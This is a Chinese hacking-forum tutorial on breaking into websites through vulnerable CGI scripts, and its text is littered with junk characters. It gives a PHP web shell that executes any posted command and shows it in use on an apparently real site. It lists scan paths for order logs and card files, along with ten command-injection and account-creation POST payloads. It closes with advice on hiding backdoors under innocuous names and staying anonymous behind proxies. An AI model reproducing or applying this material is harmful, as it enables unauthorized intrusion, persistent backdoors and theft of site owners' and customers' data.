CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
5 k3 W( v) P5 i我会长长来玩的
前言:
1 b. q& }) B' Y) o' I以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
/ r, ?$ O# W9 o4 D. V. }9 h我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
* D& f9 r% v- q$ Z! Z目录为/cgi-bin/

& w; T. Q9 b, r6 C只是个人在实务上一些经验
写的不好 请多多见谅喔
( k. c6 s0 D0 X' P$ ?9 d在这里我简单分为几个部份一定要會的
: t; T- F5 L+ t# H+ T* w讲解一下
让没有基础的人很容易上手
! b; {. w# r5 H. C( b6 T7 P( {* M0 ~
以下内容跟帖回复才能看到
==============================
5 h, m- V6 E/ V4 h: i. t  w8 a7 H
第1部份: 何谓Shell?
* z; b' ~5 R* nShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
- A! Q6 k9 D& }( M# TA shell is the program which reads user input from the command line and executes actions based upon that input.
2 R  j: Q7 V; b& w# c+ _意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
1 Z. x' s# \' h) F& K4 F! J- ~7 I; z
3 U9 t; p+ J0 q, `0 r) t  y4 J' V# x4 A对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
$ S1 u' K" t$ q要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
3 I$ F& C. ]7 @/ b9 u所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
. P7 }* X! e5 P) k5 }# |
, a: [+ z# }  E9 N6 ~9 j第2部份: Unix 指令
- `# l: q) h9 ~0 V: j0 o' C. V以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
4 _: M- n0 M. `6 U5 N如 /home/www/site.com/cgi-bin/
/ Z  o& t$ h: [) Tls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
# @4 L2 o/ I; O9 H$ n  K2 \ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
% k" v$ n# _5 |! ]5 R5 f4 ^/ Q3 t+ ^4 T1 ols ../ -al: 详细列出上一层的资料夹及档案
$ W2 x, @1 r+ S/ Z. Z9 Ncat: 显示档案内容
: w- \' ~* [: ?! q/ J0 L/ s' {cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
. c7 l, t/ y- |. v2 j7 `$ Wcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
8 D# o( }) W' F8 J1 N8 N; rman ls: 显示ls这指令的用法  
' u; a4 F8 ?6 n0 Z9 Q% Kmkdir 建立目录
1 k0 v2 {% O1 zrmdir 删除目录
; O$ @# ?. U+ b& O% X% {6 |. r1 m, umv 移动档案
7 f) A' E4 `$ ?4 n* srm 删除档案
7 E& C( ?: R& D4 w" x: |2 I
: }* |' r) g* U3 J; H' W第3部份: Shell的使用
例如:
http://site.com/refer.php
这是我的後门, 原代码如下:
# K7 Y0 J/ V' ]<Form Action="#" Method="POST">
" l' ]3 r# z) f2 K$ e<Input type="text" name="cmd">
<Input type="Submit">
</Form>
: V3 g: j3 s/ e, Z* g, g8 d2 G6 a<?php
$cmd = $_POST['cmd'];
" v9 I7 Z1 F# B0 U: C! ]$Output = shell_exec($cmd);
/ h1 O) @  |( d# Q7 M, vecho $Output;
?>
, M* R/ G( ^. X+ P; a; S3 x输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
) v% H/ Q) Z- @# d, D
第4部份: 注意事项
- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
/ m" o/ \/ M( X  ?- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
+ r7 V; Z6 b$ Z# H: N针对网站的渗透分析方法太多了
5 F7 a) V' e# a3 ]- g2 ^( i这篇文章的重点是cgi 脚本攻击
2 P9 d: R2 t; b# {( @所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
% R% l$ l" F; N- E我们需要的东西有
6 i) X9 y! h3 M4 u4 k+ f扫洞工具 如:triton..等等
, g( j  e# x5 ^6 Q6 a8 @E表
. {  u  ^( S! X1 r, i如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
  c7 v4 d2 n- r: \' G/Admin_files/order.log
: p" x3 ?6 F& {' T1 w  V( Z5 B/orders/mountain.cfg
/cgi-sys/cart.pl
# A$ S% a8 @+ \2 |& X. B, H  y- n/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day
( i0 M. \$ `" f9 q7 P
( `# @$ t, H" E, `! B) n3 ]2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
1 V* y  e3 e# x% z3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等
8 h  S' U& I  \
以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
2 {" K3 ?2 A5 o) w, n/index.cgi
3 g3 w9 M+ C* S3 Q+ cwei=ren&gen=command
/passmaster.cgi
- m2 g1 I3 B8 |1 m5 N5 A  x) IAction=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
$ G" a% I5 z% M7 ]& w6 g' g2 mname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
0 i' y7 C0 v2 ~2 S- Q8 G  u9 G1 q/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
# X; I' E: p0 N$ R% q2 J3 dpost_values=username:password
/ h) e1 B4 t+ w9 `$ Y3 R2 y1 Z/count.cgi
pinfile=|echo;ls -la;exit|
8 ]4 ], ?. ]% `+ x) \/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
' s$ ]6 L. X, @0 k/af.cgi_browser_out=|echo;ls -la;exit;|
, A3 w: u3 t# q; E9 H; B3 ]
今天就讲到这  感谢大家支持
: S; l4 e' l7 {& |; l